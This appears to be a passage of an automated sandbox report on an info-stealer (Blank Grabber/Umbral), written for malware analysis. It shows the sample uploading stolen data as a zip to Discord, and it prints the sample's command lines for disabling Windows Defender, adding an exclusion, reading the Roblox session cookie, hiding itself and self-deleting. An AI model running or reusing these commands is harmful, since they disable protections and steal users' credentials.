                            2024-08-27 18:06:03 UTC16355OUTData Raw: 99 7f 5d 96 f8 ac 50 50 b7 d8 dd ea 25 61 0c 5a c2 0c 6d 33 e8 e2 32 6c 0a c8 a3 01 5b a0 fe ba e5 c6 68 ca 40 ea 08 ef d8 72 70 1f ee a5 59 c7 25 2d d3 da 03 c3 77 4a 5f 09 8e 99 01 1e 48 e2 87 c6 de b1 96 0b b3 63 ef 50 31 e2 5d 9f 23 7a 89 c8 de 79 65 46 4c d8 50 b0 f9 a0 81 3d 5d 89 8a 7a a9 b0 68 0c 7a b3 eb 8f e9 69 62 85 50 50 d3 1f 2e 0a 4f 1f 0e a6 ad 86 ff 67 a8 5f 65 54 c8 d9 9e b1 4f 2a 08 75 6f 15 8b 79 d7 1e f7 8d 50 79 f4 91 c7 8e 4f b8 94 ad c4 d8 43 7e 56 1a da f8 92 6c d6 91 f4 b6 ce e5 25 1f 3e 83 b3 f9 c5 ad 2b c0 99 a2 c2 49 4e e7 a8 86 db f7 34 c5 2c 58 64 86 89 cd 10 e9 6c 40 00 92 9a e0 4a 62 8b 6c 3d df e4 19 42 60 fb 2d a9 dc fe 49 65 d6 ae 34 ce b6 ff 4d ab 44 a6 1f 27 d6 28 56 62 fd a2 95 6a 4e f7 81 1f b7 f7 80 ec 2c 82 f5 d2
                            Data Ascii: ]PP%aZm32l[h@rpY%-wJ_HcP1]#zyeFLP=]zhzibPP.Og_eTO*uoyPyOC~Vl%>+IN4,Xdl@Jbl=B`-Ie4MD'(VbjN,
                            2024-08-27 18:06:03 UTC16355OUTData Raw: fd 4c 74 1d 02 10 0a c9 86 c7 ff 08 af 88 4f 8e 88 d5 9d 2b 53 b6 d7 03 f7 96 4d 7f f3 58 61 6e ea 1d 94 5a 6e f9 69 6c 45 1d 54 1f e4 d8 53 73 37 fc 77 18 b8 47 a7 b1 a7 f9 23 1d 8e 25 ce 17 c3 28 7d d1 11 0f 90 79 e5 48 98 0f 7f 18 9f ce f6 c0 05 c9 7b 58 4f 67 a2 5e 8d 64 21 83 ab 2e 4a 2a b4 a6 bb 4d 6a 7f 86 6b 52 2a 2b f4 0a 05 9f b9 f5 8d 44 74 7c 7b d2 9c e9 d3 8b b1 07 7f fc c8 94 28 09 3b 24 77 e3 f8 86 1f 78 97 b9 62 72 ea 9d c0 a6 54 03 bd 85 79 67 53 f1 2f 85 69 35 92 e9 e1 a6 bf 2e e6 4d cc 1a b1 57 b6 5a 03 0f 12 d9 9b d4 67 47 d4 cc 81 db 17 54 64 d9 2b d7 65 fe 63 8c 2c 98 1e 8e 74 32 66 b1 80 44 5f d0 bb ef 19 26 c8 83 db 73 19 30 dc 58 a6 f8 09 10 a2 18 b8 27 ef 14 ef 46 d6 8a 61 b7 29 ff 18 aa 58 1f 3c 04 ba 13 f6 09 ec 19 0b a7 2d bd
                            Data Ascii: LtO+SMXanZnilETSs7wG#%(}yH{XOg^d!.J*MjkR*+Dt|{(;$wxbrTygS/i5.MWZgGTd+ec,t2fD_&s0X'Fa)X<-
                            2024-08-27 18:06:03 UTC16355OUTData Raw: 34 d9 a2 38 82 c1 da fe f1 6f 9d 19 e4 85 b7 1d 77 4c 06 77 65 15 2b 8e 96 f5 4b b7 3d 13 17 f9 f5 32 99 bb 67 ee e2 4d 7b 64 d0 07 b2 49 85 fd 91 3d 4d f5 49 11 73 b9 d3 3a f3 df 09 e1 4a c2 cf 4b 3b 13 14 38 f1 1a ac e4 88 1e f8 eb 69 ff e4 28 59 ce 2a d4 f3 18 fd ac 57 2c c4 d3 95 85 a8 55 e8 8c 12 8b fc a5 75 54 71 53 56 ec a5 c2 d0 fd f9 81 e4 4f 57 00 8f c7 80 a1 cf 2b b6 19 fb b2 13 e7 01 9c e5 49 9b bc 9c f7 e6 e3 72 5e 44 55 c4 0e 92 f8 76 02 12 b1 7d 92 f6 2f e7 b7 6b c5 12 1b 5e 8c fd 2c 47 eb 15 20 e5 31 b7 4a c6 5d 15 7c c0 1b b3 f6 d6 bf e5 43 36 3e d8 6d a9 2f 31 84 48 0f 76 11 0f 26 4b cf 6a 02 fc dd c7 4f 83 37 d6 c2 1b f7 14 42 f2 c3 97 47 c9 91 e6 02 26 1b 4e cd 92 59 21 cd db 7a 8e 42 61 ea 96 e6 29 43 1d 52 df 84 48 97 86 57 ff 3e 0d
                            Data Ascii: 48owLwe+K=2gM{dI=MIs:JK;8i(Y*W,UuTqSVOW+Ir^DUv}/k^,G 1J]|C6>m/1Hv&KjO7BG&NY!zBa)CRHW>
                            2024-08-27 18:06:03 UTC16355OUTData Raw: bb 4e 1e 38 fa bf d5 20 34 10 e9 57 2d fe fc 58 9c e3 ef 81 88 ec b1 b3 4d dc a8 b9 5c 75 0b 82 bb 16 33 b7 23 b7 f6 1c 64 f6 32 19 67 35 c7 39 93 fd 9a 40 6f 71 d8 fe 41 16 78 5e fc 92 39 55 81 9f bb 19 d5 a3 56 b6 5f 81 01 2c f0 15 20 ae bc b1 76 f0 95 9b 7a 29 7b 4a fe 13 01 d2 e7 71 17 e2 78 bf 1c 90 a6 41 d7 b9 f8 6e 32 3a 20 cf 8d ce 9f b8 c4 ae 10 ef 1b 25 17 8f 17 e9 a8 0d 47 53 0e f0 54 cc 45 78 3a 32 a6 0e 24 88 10 d8 87 03 bd a0 f0 71 4d fb a7 e0 9e a8 da bb 7d 60 4b 32 db 8d 04 9a 9f 26 41 32 b8 f6 c0 a6 ef 04 f4 79 22 0c ad 83 4f ae b1 1f 3e 8d c8 d3 d6 4c c4 c5 1c 1e f8 95 3c 71 b2 1a e8 2b 3f 44 38 b7 6f 99 d7 b1 48 60 ba 22 c0 64 3b 88 e8 d6 1d 55 67 b3 cf c6 8c 79 95 a5 f4 c6 f4 b6 69 90 35 3f b4 4b 94 af 50 e9 42 cc 53 8e 35 af a3 3a f0
                            Data Ascii: N8 4W-XM\u3#d2g59@oqAx^9UV_, vz){JqxAn2: %GSTEx:2$qM}`K2&A2y"O>L<q+?D8oH`"d;Ugyi5?KPBS5:
                            2024-08-27 18:06:04 UTC1369INHTTP/1.1 200 OK
                            Date: Tue, 27 Aug 2024 18:06:04 GMT
                            Content-Type: application/json
                            Transfer-Encoding: chunked
                            Connection: close
                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                            x-ratelimit-limit: 5
                            x-ratelimit-remaining: 4
                            x-ratelimit-reset: 1724781965
                            x-ratelimit-reset-after: 1
                            vary: Accept-Encoding
                            via: 1.1 google
                            alt-svc: h3=":443"; ma=86400
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1JxDf3CRtnntajpoa%2BmIv8u2DFdHLsoie8ptxNIInFMBlz5B%2BEOHhljNq8iApoMo2imSeHUUdj3eHnWnsbo9eizTr5SdT5oea78vJqMq7d5UIQ%2BukA%2FHBdhcxju"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            X-Content-Type-Options: nosniff
                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                            Server: cloudflare
                            CF-RAY: 8b9dfe46e9a443fa-EWR
                            40b
                            {"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1278052932096491550","filename":"Umbral-927537.zip","size":674274,"url":"https://cdn.discordapp.com/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?ex=66cf670c&is=66ce158c&hm=ce5863cb3a6025b377a65f0bb5b3685c21506ae254be1afb38e1bcbbaf1ecdc1&","proxy_url":"https://media.discordapp.net/attachments/1176050474064019486/12780529320964


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:14:05:00
                            Start date:27/08/2024
                            Path:C:\Users\user\Desktop\obvious.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\obvious.exe"
                            Imagebase:0x12f5f5a0000
                            File size:235'008 bytes
                            MD5 hash:EABE2A81AA3DABAB25E49EE4B36CE075
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:1
                            Start time:14:05:02
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:"wmic.exe" csproduct get uuid
                            Imagebase:0x7ff678770000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:2
                            Start time:14:05:02
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:3
                            Start time:14:05:04
                            Start date:27/08/2024
                            Path:C:\Windows\System32\attrib.exe
                            Wow64 process (32bit):false
                            Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"
                            Imagebase:0x7ff67c530000
                            File size:23'040 bytes
                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:4
                            Start time:14:05:04
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:14:05:04
                            Start date:27/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:14:05:04
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:14:05:07
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff693ab0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:14:05:11
                            Start date:27/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:9
                            Start time:14:05:11
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:14:05:13
                            Start date:27/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:14:05:13
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:15
                            Start time:14:05:23
                            Start date:27/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:14:05:23
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:14:05:37
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:"wmic.exe" os get Caption
                            Imagebase:0x7ff678770000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:18
                            Start time:14:05:37
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:19
                            Start time:14:05:38
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:"wmic.exe" computersystem get totalphysicalmemory
                            Imagebase:0x7ff678770000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:20
                            Start time:14:05:38
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:14:05:39
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:"wmic.exe" csproduct get uuid
                            Imagebase:0x7ff678770000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:14:05:39
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:14:05:39
                            Start date:27/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:24
                            Start time:14:05:39
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:26
                            Start time:14:05:58
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:"wmic" path win32_VideoController get name
                            Imagebase:0x7ff678770000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:27
                            Start time:14:05:59
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:28
                            Start time:14:06:04
                            Start date:27/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause
                            Imagebase:0x7ff6b1070000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:29
                            Start time:14:06:05
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:30
                            Start time:14:06:06
                            Start date:27/08/2024
                            Path:C:\Windows\System32\PING.EXE
                            Wow64 process (32bit):false
                            Commandline:ping localhost
                            Imagebase:0x7ff67c890000
                            File size:22'528 bytes
                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:17.4%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:100%
                              Total number of Nodes:3
                              Total number of Limit Nodes:0
                              execution_graph 36610 7ffd9bc9378c 36611 7ffd9bc9378f CryptUnprotectData 36610->36611 36613 7ffd9bc93843 36611->36613

                              Executed Functions

                              Function 00007FFD9BCA69E1 Relevance: 31.7, Strings: 24, Instructions: 1657COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 7ffd9bca69e1-7ffd9bca69ef 1 7ffd9bca69f2-7ffd9bca69fb 0->1 2 7ffd9bca69f1 0->2 3 7ffd9bca69fc-7ffd9bca6a05 1->3 2->1 4 7ffd9bca6a08-7ffd9bca6a19 3->4 5 7ffd9bca6a07 3->5 6 7ffd9bca6a1c-7ffd9bca6a29 4->6 7 7ffd9bca6a1b 4->7 5->4 6->3 8 7ffd9bca6a2b-7ffd9bca6a37 6->8 7->6 10 7ffd9bca6a39-7ffd9bca6a4f 8->10 11 7ffd9bca6a81-7ffd9bca6a96 8->11 13 7ffd9bca6aa8-7ffd9bca6abc 10->13 14 7ffd9bca6a51-7ffd9bca6a54 10->14 18 7ffd9bca6b06-7ffd9bca6b1b 13->18 19 7ffd9bca6abe-7ffd9bca6ad3 13->19 16 7ffd9bca6a56-7ffd9bca6a5d 14->16 17 7ffd9bca6ad5-7ffd9bca6aee 14->17 16->11 22 7ffd9bca6af0-7ffd9bca6af2 17->22 23 7ffd9bca6b6f-7ffd9bca6b7e 17->23 42 7ffd9bca6b22-7ffd9bca6b25 call 7ffd9bca5ea0 18->42 19->17 26 7ffd9bca6b6e 22->26 27 7ffd9bca6af4-7ffd9bca6afa 22->27 28 7ffd9bca6b80-7ffd9bca6b85 23->28 26->23 34 7ffd9bca6b3c-7ffd9bca6b45 27->34 35 7ffd9bca6afc-7ffd9bca6b04 27->35 31 7ffd9bca6b88-7ffd9bca6b9d 28->31 32 7ffd9bca6b87 28->32 36 7ffd9bca6b9f-7ffd9bca6bd8 31->36 32->31 40 7ffd9bca6b47-7ffd9bca6b67 34->40 41 7ffd9bca6b8f-7ffd9bca6b9d 34->41 35->18 35->28 37 7ffd9bca6bda-7ffd9bca6c23 36->37 38 7ffd9bca6c24-7ffd9bca6c28 36->38 37->38 45 7ffd9bca6cec-7ffd9bca6d0d 38->45 46 7ffd9bca6c2e-7ffd9bca6c4a 38->46 41->36 53 7ffd9bca6b2a-7ffd9bca6b3b call 7ffd9bca6b3c 42->53 50 7ffd9bca6d14-7ffd9bca6d25 45->50 51 7ffd9bca6c4c-7ffd9bca6c53 46->51 52 7ffd9bca6c54-7ffd9bca6c59 46->52 55 7ffd9bca6d27 50->55 56 7ffd9bca6d2c-7ffd9bca6d5c 50->56 54 7ffd9bca6c5a-7ffd9bca6c5c 51->54 52->54 59 7ffd9bca6c5e-7ffd9bca6c60 54->59 60 7ffd9bca6c62-7ffd9bca6c83 54->60 55->56 69 7ffd9bca6d5e-7ffd9bca6d9e 56->69 70 7ffd9bca6db3-7ffd9bca6ddf 56->70 63 7ffd9bca6c85-7ffd9bca6c86 59->63 60->63 68 7ffd9bca6c8e-7ffd9bca6ca1 63->68 68->50 75 7ffd9bca6ca3-7ffd9bca6ce3 68->75 93 7ffd9bca6dfc-7ffd9bca6e00 69->93 96 7ffd9bca6da1-7ffd9bca6db2 69->96 72 7ffd9bca6de5-7ffd9bca6df8 70->72 73 7ffd9bca6ea7-7ffd9bca6ecb 70->73 82 7ffd9bca6df9 72->82 77 7ffd9bca6ecd-7ffd9bca6ed1 73->77 80 7ffd9bca6f02-7ffd9bca6f09 77->80 81 7ffd9bca6ed2-7ffd9bca6ed8 77->81 87 7ffd9bca6f0b-7ffd9bca6f16 80->87 88 7ffd9bca6f60-7ffd9bca6f8c 80->88 92 7ffd9bca6edf-7ffd9bca6f01 81->92 85 7ffd9bca6dfb 82->85 86 7ffd9bca6e01-7ffd9bca6e41 82->86 85->93 86->82 87->77 95 7ffd9bca6f18-7ffd9bca6f5c 87->95 90 7ffd9bca6f92-7ffd9bca7052 88->90 91 7ffd9bca7054-7ffd9bca707e 88->91 90->91 98 7ffd9bca7080-7ffd9bca7097 91->98 99 7ffd9bca70af-7ffd9bca70b6 91->99 92->80 93->86 95->88 96->70 126 7ffd9bca709c-7ffd9bca70ae 98->126 102 7ffd9bca70b8-7ffd9bca70f9 99->102 103 7ffd9bca710d-7ffd9bca7139 99->103 124 7ffd9bca7156-7ffd9bca71eb 102->124 140 7ffd9bca70fb-7ffd9bca710c 102->140 109 7ffd9bca713f-7ffd9bca7152 103->109 110 7ffd9bca7201-7ffd9bca722b 103->110 109->124 117 7ffd9bca725c-7ffd9bca7263 110->117 118 7ffd9bca722d-7ffd9bca7232 110->118 122 7ffd9bca7265-7ffd9bca72b8 117->122 123 7ffd9bca72ba-7ffd9bca72cd 117->123 132 7ffd9bca7239-7ffd9bca7249 118->132 122->123 130 7ffd9bca732b-7ffd9bca739a 123->130 131 7ffd9bca72cf-7ffd9bca72e6 123->131 156 7ffd9bca724c-7ffd9bca725b 124->156 224 7ffd9bca71ed 124->224 126->99 186 7ffd9bca73f7-7ffd9bca7408 130->186 207 7ffd9bca739c-7ffd9bca73ab 130->207 135 7ffd9bca72ec-7ffd9bca732a 131->135 136 7ffd9bca73ae-7ffd9bca73c8 131->136 149 7ffd9bca724a 132->149 135->130 144 7ffd9bca7426-7ffd9bca7451 136->144 145 7ffd9bca73ca-7ffd9bca73d8 136->145 140->103 177 7ffd9bca74b0-7ffd9bca7559 144->177 178 7ffd9bca7453 144->178 147 7ffd9bca73da-7ffd9bca73df 145->147 148 7ffd9bca7409-7ffd9bca7410 145->148 163 7ffd9bca73e6-7ffd9bca73f6 147->163 157 7ffd9bca7467-7ffd9bca7493 148->157 158 7ffd9bca7412-7ffd9bca7425 148->158 149->156 156->117 164 7ffd9bca7499-7ffd9bca74ac 157->164 165 7ffd9bca755b-7ffd9bca7585 157->165 158->144 163->186 164->177 173 7ffd9bca75b6-7ffd9bca75b7 165->173 174 7ffd9bca7587-7ffd9bca759e 165->174 181 7ffd9bca75b9-7ffd9bca75fa 173->181 182 7ffd9bca760e-7ffd9bca763a 173->182 206 7ffd9bca75a3-7ffd9bca75b5 174->206 177->165 178->177 184 7ffd9bca7455-7ffd9bca7463 178->184 204 7ffd9bca7657-7ffd9bca76ec 181->204 223 7ffd9bca75fc-7ffd9bca760a 181->223 188 7ffd9bca7640-7ffd9bca7653 182->188 189 7ffd9bca7702-7ffd9bca772c 182->189 184->157 186->148 188->204 197 7ffd9bca772e-7ffd9bca7733 189->197 198 7ffd9bca775d-7ffd9bca775e 189->198 215 7ffd9bca773a-7ffd9bca7745 197->215 200 7ffd9bca77b5-7ffd9bca77e1 198->200 201 7ffd9bca7760-7ffd9bca77b1 198->201 211 7ffd9bca77e7-7ffd9bca7843 200->211 212 7ffd9bca78a9-7ffd9bca78d3 200->212 201->200 222 7ffd9bca7748-7ffd9bca774a 204->222 261 7ffd9bca76ee 204->261 206->173 211->212 218 7ffd9bca78d5-7ffd9bca78da 212->218 219 7ffd9bca7904-7ffd9bca790b call 7ffd9bca7954 212->219 215->222 230 7ffd9bca78e1-7ffd9bca7940 call 7ffd9bca7954 218->230 236 7ffd9bca7942-7ffd9bca7953 219->236 228 7ffd9bca774b-7ffd9bca775c 222->228 223->182 224->149 231 7ffd9bca71ef-7ffd9bca71ff 224->231 228->198 230->236 231->110 261->228 262 7ffd9bca76f0-7ffd9bca7700 261->262 262->189
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
